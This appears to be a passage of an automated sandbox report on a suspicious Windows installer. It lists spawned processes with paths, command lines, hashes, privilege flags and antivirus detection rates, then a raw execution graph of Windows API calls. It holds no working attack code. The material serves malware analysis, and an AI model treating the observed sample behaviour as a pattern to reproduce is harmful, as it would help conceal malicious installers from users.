                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                                          Start time:08:54:13
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\TEMP\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe" -burn.clean.room="C:\Users\user\Desktop\kXzODlqJak.exe" -burn.filehandle.attached=636 -burn.filehandle.self=632
                                                                                                                                                                                                                                                                          Imagebase:0xf20000
                                                                                                                                                                                                                                                                          File size:14'302'064 bytes
                                                                                                                                                                                                                                                                          MD5 hash:2C6652F7E01283DE091B5200B7878E69
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 29%, ReversingLabs
                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                                          Start time:08:54:15
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\TEMP\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
Imagebase:0xa50000
File size:6'487'736 bytes
MD5 hash:11C8962675B6D535C018A63BE0821E4C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 3%, ReversingLabs
Reputation:moderate
Has exited:true

Target ID:4
Start time:08:54:17
Start date:09/01/2025
Path:C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
Imagebase:0x750000
File size:6'487'736 bytes
MD5 hash:11C8962675B6D535C018A63BE0821E4C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 3%, ReversingLabs
Reputation:moderate
Has exited:true

Target ID:5
Start time:08:54:18
Start date:09/01/2025
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\cmd.exe
Imagebase:0xa40000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:08:54:18
Start date:09/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:08:54:43
Start date:09/01/2025
Path:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Imagebase:0x140000000
File size:2'364'728 bytes
MD5 hash:967F4470627F823F4D7981E511C9824F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:moderate
Has exited:true

Target ID:10
Start time:08:54:55
Start date:09/01/2025
Path:C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe"
Imagebase:0x750000
File size:6'487'736 bytes
MD5 hash:11C8962675B6D535C018A63BE0821E4C
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:11
Start time:08:54:56
Start date:09/01/2025
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\cmd.exe
Imagebase:0xa40000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:08:54:56
Start date:09/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:15
Start time:08:55:15
Start date:09/01/2025
Path:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Imagebase:0x140000000
File size:2'364'728 bytes
MD5 hash:967F4470627F823F4D7981E511C9824F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                                                                          Start time:08:55:34
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                                                          Start time:08:55:35
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                                                                          Start time:08:55:35
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=2096,i,8130310607339759399,8200688204715788640,262144 /prefetch:3
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                                                          Start time:08:55:35
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2772 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:3
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                                                                                          Start time:08:55:41
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7120 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                                                                                                          Start time:08:55:41
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7172 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:29
                                                                                                                                                                                                                                                                          Start time:08:56:35
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7288 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:false


Execution Graph

Execution Coverage:4.7%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:8.8%
Total number of Nodes:1875
Total number of Limit Nodes:44
50095->49794 50096->49802 50097->49798 50098->49799 50099->49800 50100->50081 50101->50085 50102->50087 50104 8e1ae9 56 API calls 50103->50104 50105 8e2b0d 50104->50105 50105->49709 50105->49806 50107 8e38bb 50106->50107 50109 8e38c5 50106->50109 50111 8e593a GetProcessHeap HeapSize 50107->50111 50109->49819 50110->49820 50111->50109 50740 930ef0 15 API calls 50741 8e9ae0 60 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 50742 909ce0 175 API calls 50743 910ee0 81 API calls 50745 930ce0 16 API calls _memcpy_s 50747 8e94f0 76 API calls 2 library calls 50748 90d010 19 API calls 50749 91e210 55 API calls 50750 8f940e 84 API calls 50751 931e10 GetCommandLineA GetCommandLineW 50753 8e9000 72 API calls 50754 926800 49 API calls __RTC_Initialize 50755 933000 GetProcessHeap 50757 926a07 21 API calls _unexpected 50758 8e8e10 6 API calls 50112 90de30 50113 90de52 50112->50113 50118 90de5c 50112->50118 50114 90de57 50113->50114 50115 90de6c 50113->50115 50114->50118 50149 90e2b8 DosDateTimeToFileTime LocalFileTimeToFileTime SetFileTime 50114->50149 50119 90e386 SetEvent 50115->50119 50120 90e3e5 50119->50120 50121 90e39f GetLastError 50119->50121 50122 8e174a 2 API calls 50120->50122 50147 90e3ab 50121->50147 50123 90e3ef 50122->50123 50124 90e419 ResetEvent 50123->50124 50123->50147 50125 90e426 GetLastError 50124->50125 50126 90e46c 50124->50126 50125->50147 50127 8e2ec6 10 API calls 50126->50127 50126->50147 50128 90e4c7 50127->50128 50129 90e4f4 SetEvent 50128->50129 50128->50147 50130 90e501 GetLastError 50129->50130 50131 90e547 50129->50131 50130->50147 50132 8e174a 2 API calls 50131->50132 50133 90e551 50132->50133 50134 90e573 ResetEvent 50133->50134 50133->50147 50135 90e580 GetLastError 50134->50135 50136 90e5c6 50134->50136 50135->50147 50137 90e5d3 50136->50137 50138 90e66d 50136->50138 50137->50147 50150 8e540b GetProcessHeap RtlAllocateHeap 50137->50150 50140 90e692 GetLastError 
50138->50140 50141 90e6dc SetFilePointerEx 50138->50141 50148 90e69e 50140->50148 50142 90e6f0 GetLastError 50141->50142 50143 90e736 SetEndOfFile 50141->50143 50142->50147 50144 90e743 GetLastError 50143->50144 50145 90e786 SetFilePointerEx 50143->50145 50144->50147 50146 90e797 GetLastError 50145->50146 50145->50147 50146->50147 50147->50118 50148->50141 50149->50118 50150->50147 50759 8f2c2a LoadLibraryExW GetLastError GetProcAddress GetLastError 50170 94c43d 50171 94c41c 50170->50171 50172 94c6ef ___delayLoadHelper2@8 16 API calls 50171->50172 50172->50171 50760 8e6a25 89 API calls 50761 8fe622 64 API calls 50762 8e9c20 79 API calls 2 library calls 50196 90de20 50197 8e55c9 3 API calls 50196->50197 50198 90de2b 50197->50198 50764 8f9839 94 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 50766 8e9430 9 API calls 50770 926a50 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 50771 90fa55 77 API calls 50773 8e6c2a 7 API calls 50774 92de5b 42 API calls 2 library calls 50779 932070 7 API calls 50780 930670 72 API calls 2 library calls 50781 937e70 IsProcessorFeaturePresent 50784 8e8e60 87 API calls 50785 923604 117 API calls 50645 8e7e72 50646 8e7e78 50645->50646 50647 8e7ee0 50646->50647 50687 8e367f GetProcessHeap RtlFreeHeap GetLastError 50646->50687 50649 8e7ef2 50647->50649 50688 8fa9ad 128 API calls 50647->50688 50650 8f56b4 92 API calls 50649->50650 50652 8e7efe 50650->50652 50653 8ffbe8 92 API calls 50652->50653 50654 8e7f0a 50653->50654 50655 8ffdf6 3 API calls 50654->50655 50656 8e7f16 50655->50656 50657 8e7f42 50656->50657 50658 8e8119 72 API calls 50656->50658 50659 8e8119 72 API calls 50657->50659 50658->50657 50660 8e7f80 50659->50660 50661 93ae56 4 API calls 50660->50661 50662 8e7fc4 50661->50662 50663 8fc13d 54 API calls 50662->50663 50664 8e7ff0 50663->50664 50665 90d6fd 2 API calls 50664->50665 50666 8e803c 
50665->50666 50667 906157 2 API calls 50666->50667 50668 8e8050 50667->50668 50669 8e774c 10 API calls 50668->50669 50670 8e80b3 50669->50670 50671 8e80c1 50670->50671 50689 940d9c CoUninitialize 50670->50689 50673 8e80cf 50671->50673 50690 93fbc7 FreeLibrary 50671->50690 50674 8e80dd 50673->50674 50691 93d520 FreeLibrary 50673->50691 50677 8e80f0 50674->50677 50692 9410aa FreeLibrary FreeLibrary 50674->50692 50679 8e80fa 50677->50679 50680 8e80f4 CoUninitialize 50677->50680 50683 93b41c 77 API calls 50679->50683 50680->50679 50681 8e80eb 50693 93a6e3 FreeLibrary FreeLibrary 50681->50693 50684 8e8106 50683->50684 50685 9267e6 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 50684->50685 50686 8e8115 50685->50686 50687->50647 50688->50649 50689->50671 50690->50673 50691->50674 50692->50681 50693->50677 50788 905e6e 93 API calls 49009 94c19c 49010 94c17b 49009->49010 49010->49009 49011 94c6ef ___delayLoadHelper2@8 16 API calls 49010->49011 49011->49010 49012 8e7b87 49013 8e7ba6 49012->49013 49014 8e7b90 49012->49014 49017 8e7bb1 CoInitializeEx 49013->49017 49190 90d137 13 API calls 49014->49190 49016 8e7ba4 49016->49013 49018 8e7b31 49017->49018 49019 8e7ee0 49018->49019 49191 8e367f GetProcessHeap RtlFreeHeap GetLastError 49018->49191 49021 8e7ef2 49019->49021 49192 8fa9ad 128 API calls 49019->49192 49059 8f56b4 49021->49059 49028 8e7f16 49029 8e7f42 49028->49029 49030 8e8119 72 API calls 49028->49030 49031 8e8119 72 API calls 49029->49031 49030->49029 49032 8e7f80 49031->49032 49083 93ae56 EnterCriticalSection 49032->49083 49034 8e7fc4 49088 8fc13d 49034->49088 49040 8e8050 49108 8e774c 49040->49108 49042 8e80b3 49043 8e80c1 49042->49043 49193 940d9c CoUninitialize 49042->49193 49045 8e80cf 49043->49045 49194 93fbc7 FreeLibrary 49043->49194 49046 8e80dd 49045->49046 49195 93d520 FreeLibrary 49045->49195 49049 8e80f0 49046->49049 49196 9410aa FreeLibrary FreeLibrary 49046->49196 49051 
8e80fa 49049->49051 49052 8e80f4 CoUninitialize 49049->49052 49179 93b41c 49051->49179 49052->49051 49053 8e80eb 49197 93a6e3 FreeLibrary FreeLibrary 49053->49197 49057 9267e6 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 49058 8e8115 49057->49058 49060 8e7efe 49059->49060 49061 8f56c1 49059->49061 49063 8ffbe8 49060->49063 49198 8e5c81 49061->49198 49064 8ffbf8 49063->49064 49065 8e7f0a 49063->49065 49066 8e5c81 92 API calls 49064->49066 49067 8ffdf6 49065->49067 49066->49065 49068 8ffe0e 49067->49068 49069 8ffe03 49067->49069 49071 8ffe1c 49068->49071 49304 8e367f GetProcessHeap RtlFreeHeap GetLastError 49068->49304 49303 8e3605 GetProcessHeap RtlFreeHeap GetLastError 49069->49303 49073 8ffe2a 49071->49073 49305 8e367f GetProcessHeap RtlFreeHeap GetLastError 49071->49305 49075 8ffe38 49073->49075 49306 8e367f GetProcessHeap RtlFreeHeap GetLastError 49073->49306 49077 8ffe48 49075->49077 49307 8e367f GetProcessHeap RtlFreeHeap GetLastError 49075->49307 49079 8ffe58 49077->49079 49308 8e367f GetProcessHeap RtlFreeHeap GetLastError 49077->49308 49081 8ffe68 _memcpy_s 49079->49081 49309 8e367f GetProcessHeap RtlFreeHeap GetLastError 49079->49309 49081->49028 49084 93ae71 FlushFileBuffers 49083->49084 49087 93ae6e 49083->49087 49085 93aec4 LeaveCriticalSection 49084->49085 49086 93ae7c GetLastError 49084->49086 49085->49034 49086->49087 49087->49085 49310 93a051 49088->49310 49090 8fc15b 49091 93a051 6 API calls 49090->49091 49100 8fc161 49090->49100 49092 8fc195 49091->49092 49093 8fc1ce 49092->49093 49092->49100 49313 8fb637 48 API calls 49092->49313 49093->49100 49314 8fb637 48 API calls 49093->49314 49095 8e7ff0 49101 90d6fd IsWindow 49095->49101 49097 8e55c9 3 API calls 49097->49095 49098 8fc1f7 49099 8e174a 2 API calls 49098->49099 49098->49100 49099->49100 49100->49095 49100->49097 49102 90d714 PostMessageW 49101->49102 49103 8e803c 49101->49103 49102->49103 49104 906157 
49103->49104 49105 906163 49104->49105 49106 906170 49104->49106 49107 8e174a 2 API calls 49105->49107 49106->49040 49107->49106 49109 8e775e 49108->49109 49110 8e7764 49108->49110 49488 939966 LocalFree 49109->49488 49112 8e7774 49110->49112 49113 8e55c9 3 API calls 49110->49113 49114 8e55c9 3 API calls 49112->49114 49115 8e7784 DeleteCriticalSection 49112->49115 49113->49112 49114->49115 49117 8e77ce 49115->49117 49326 8fb9e9 49117->49326 49119 8e77fe 49120 8fb9e9 3 API calls 49119->49120 49121 8e780a 49120->49121 49122 8e781a 49121->49122 49489 8e367f GetProcessHeap RtlFreeHeap GetLastError 49121->49489 49332 8f058b 49122->49332 49127 8e7856 49344 8ee956 49127->49344 49133 8e787a 49359 8ec06f DeleteCriticalSection 49133->49359 49139 8e789e 49450 8f003c 49139->49450 49145 8e78bf 49480 8ef3f2 49145->49480 49148 8e78d8 49150 8e78e5 49148->49150 49491 8e367f GetProcessHeap RtlFreeHeap GetLastError 49148->49491 49151 8e78f2 49150->49151 49492 8e367f GetProcessHeap RtlFreeHeap GetLastError 49150->49492 49154 8e78ff 49151->49154 49493 8e367f GetProcessHeap RtlFreeHeap GetLastError 49151->49493 49156 8e790f 49154->49156 49494 8e367f GetProcessHeap RtlFreeHeap GetLastError 49154->49494 49158 8e791f 49156->49158 49495 8e367f GetProcessHeap RtlFreeHeap GetLastError 49156->49495 49160 8e792f 49158->49160 49496 8e367f GetProcessHeap RtlFreeHeap GetLastError 49158->49496 49161 8e793f 49160->49161 49497 8e367f GetProcessHeap RtlFreeHeap GetLastError 49160->49497 49164 8e794f 49161->49164 49498 8e367f GetProcessHeap RtlFreeHeap GetLastError 49161->49498 49166 8e795f 49164->49166 49499 8e367f GetProcessHeap RtlFreeHeap GetLastError 49164->49499 49168 8e796f 49166->49168 49500 8e367f GetProcessHeap RtlFreeHeap GetLastError 49166->49500 49170 8e797f 49168->49170 49501 8e367f GetProcessHeap RtlFreeHeap GetLastError 49168->49501 49172 8e798f 49170->49172 49502 8e367f GetProcessHeap RtlFreeHeap GetLastError 49170->49502 49174 8e799f 49172->49174 49503 8e367f GetProcessHeap 
RtlFreeHeap GetLastError 49172->49503 49176 8e79af DeleteCriticalSection 49174->49176 49504 8e367f GetProcessHeap RtlFreeHeap GetLastError 49174->49504 49178 8e79c8 _memcpy_s 49176->49178 49178->49042 49634 93ac32 49179->49634 49182 93b443 49187 93b45e 49182->49187 49642 8e367f GetProcessHeap RtlFreeHeap GetLastError 49182->49642 49183 93b432 DeleteCriticalSection 49183->49182 49186 8e8106 49186->49057 49188 93b473 49187->49188 49643 8e367f GetProcessHeap RtlFreeHeap GetLastError 49187->49643 49188->49186 49644 8e367f GetProcessHeap RtlFreeHeap GetLastError 49188->49644 49190->49016 49191->49019 49192->49021 49193->49043 49194->49045 49195->49046 49196->49053 49197->49049 49199 8e5cbb _memcpy_s 49198->49199 49200 8e5cd9 GetFileAttributesW 49199->49200 49201 8e5cf4 GetLastError 49200->49201 49202 8e5d61 49200->49202 49217 8e5d00 49201->49217 49203 8e5d6d SetFileAttributesW 49202->49203 49204 8e5dda 49202->49204 49229 8e60d8 49202->49229 49203->49204 49205 8e5d7d GetLastError 49203->49205 49206 8e615c RemoveDirectoryW 49204->49206 49207 8e5e01 49204->49207 49244 8e4dd8 49204->49244 49212 8e5d89 49205->49212 49210 8e616d GetLastError 49206->49210 49206->49229 49208 8e3db5 52 API calls 49207->49208 49207->49217 49213 8e5e3a FindFirstFileW 49208->49213 49211 8e6179 49210->49211 49218 8e6190 MoveFileExW 49211->49218 49211->49229 49212->49217 49219 8e5e78 GetLastError 49213->49219 49243 8e5e84 49213->49243 49214 8e62af FindClose 49214->49217 49216 8e62ca 49221 8e62de 49216->49221 49260 8e367f GetProcessHeap RtlFreeHeap GetLastError 49216->49260 49217->49216 49259 8e367f GetProcessHeap RtlFreeHeap GetLastError 49217->49259 49218->49229 49219->49243 49223 8e62f2 49221->49223 49261 8e367f GetProcessHeap RtlFreeHeap GetLastError 49221->49261 49226 9267e6 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 49223->49226 49224 8e60b7 FindNextFileW 49228 8e614d GetLastError 49224->49228 49224->49243 
49227 8e6301 49226->49227 49227->49060 49228->49206 49230 8e61fd GetLastError 49228->49230 49229->49214 49229->49217 49230->49229 49231 8e3db5 52 API calls 49231->49243 49232 8e5fba SetFileAttributesW 49233 8e600b DeleteFileW 49232->49233 49235 8e5fcf GetLastError 49232->49235 49233->49243 49234 8e3cfd 52 API calls 49234->49243 49241 8e5fdb 49235->49241 49236 8e607a GetLastError 49236->49243 49238 8e5c81 73 API calls 49238->49243 49239 8e60f2 49239->49229 49240 8e6048 MoveFileExW 49240->49241 49241->49239 49241->49240 49242 8e606a MoveFileExW 49241->49242 49241->49243 49258 8e4b8a 59 API calls 49241->49258 49242->49243 49243->49224 49243->49229 49243->49231 49243->49232 49243->49233 49243->49234 49243->49236 49243->49238 49243->49241 49245 8e4e46 49244->49245 49246 8e4df2 49244->49246 49248 8e29c8 52 API calls 49245->49248 49247 8e37f3 2 API calls 49246->49247 49249 8e4dfc 49247->49249 49248->49249 49253 8e4e02 49249->49253 49262 8e1839 49249->49262 49251 8e4e2f 49252 8e4e6c GetProcAddress 49251->49252 49251->49253 49255 8e4e83 49252->49255 49253->49207 49254 8e4f0c GetLastError 49257 8e4ec7 49254->49257 49255->49254 49256 8e29c8 52 API calls 49255->49256 49255->49257 49256->49255 49257->49253 49258->49241 49259->49216 49260->49221 49261->49223 49270 8e13da 49262->49270 49264 8e1844 49265 8e184c LoadLibraryExW 49264->49265 49266 8e18ab 49264->49266 49267 8e1866 GetLastError 49265->49267 49269 8e1872 49265->49269 49276 8e18c0 49266->49276 49267->49269 49269->49251 49271 8e146b 49270->49271 49272 8e13e7 GetModuleHandleW 49270->49272 49271->49264 49273 8e143e GetProcAddress GetProcAddress 49272->49273 49274 8e13f9 GetLastError 49272->49274 49273->49271 49275 8e1405 49274->49275 49275->49264 49286 8e48c2 49276->49286 49278 8e18d8 49279 8e2acf 56 API calls 49278->49279 49285 8e18de 49278->49285 49280 8e1910 49279->49280 49281 8e1937 LoadLibraryExW 49280->49281 49280->49285 49282 8e194c GetLastError 49281->49282 49281->49285 49282->49285 49283 8e19a7 49283->49269 
